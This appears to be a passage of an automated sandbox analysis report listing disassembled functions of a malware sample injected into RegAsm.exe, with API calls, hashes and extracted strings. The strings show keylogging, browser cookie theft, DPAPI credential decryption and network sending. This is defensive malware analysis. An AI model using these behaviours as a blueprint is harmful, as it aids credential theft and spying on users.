                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 1000536F
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 10005381
                                                • _free.LIBCMT ref: 10005394
                                                • _free.LIBCMT ref: 100053A5
                                                • _free.LIBCMT ref: 100053B6
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00444106
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 00444118
                                                • _free.LIBCMT ref: 0044412B
                                                • _free.LIBCMT ref: 0044413C
                                                • _free.LIBCMT ref: 0044414D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                • _free.LIBCMT ref: 0044E8D5
                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                • String ID: *?$.
                                                • API String ID: 2812119850-3972193922
                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00DA4958,00000010), ref: 004048E0
                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                • String ID: XQG$NG$PG
                                                • API String ID: 1634807452-3565412412
                                                • Opcode ID: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                • Opcode Fuzzy Hash: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                • _free.LIBCMT ref: 10004CE8
                                                • _free.LIBCMT ref: 10004CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                • API String ID: 2506810119-1068371695
                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                • _free.LIBCMT ref: 004435E0
                                                • _free.LIBCMT ref: 004435EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                • API String ID: 2506810119-1068371695
                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,68491986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                • API String ID: 368326130-3219657780
                                                • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 00416330
                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _wcslen$CloseCreateValue
                                                • String ID: !D@$okmode$PG
                                                • API String ID: 3411444782-3370592832
                                                • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                Strings
                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                • API String ID: 1174141254-1980882731
                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                Strings
                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                • API String ID: 1174141254-1980882731
                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                                • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$LocalTimewsprintf
                                                • String ID: Offline Keylogger Started
                                                • API String ID: 465354869-4114347211
                                                • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$LocalTime$wsprintf
                                                • String ID: Online Keylogger Started
                                                • API String ID: 112202259-1258561607
                                                • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: CryptUnprotectData$crypt32
                                                • API String ID: 2574300362-2380590389
                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandleObjectSingleWait
                                                • String ID: Connection Timeout
                                                • API String ID: 2055531096-499159329
                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw
                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                • API String ID: 2005118841-1866435925
                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                • RegSetValueExW.ADVAPI32 ref: 00413888
                                                • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: pth_unenc
                                                • API String ID: 1818849710-4028850238
                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                • String ID: bad locale name
                                                • API String ID: 3628047217-1405518554
                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeHandleLibraryModule
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 662261464-1276376045
                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
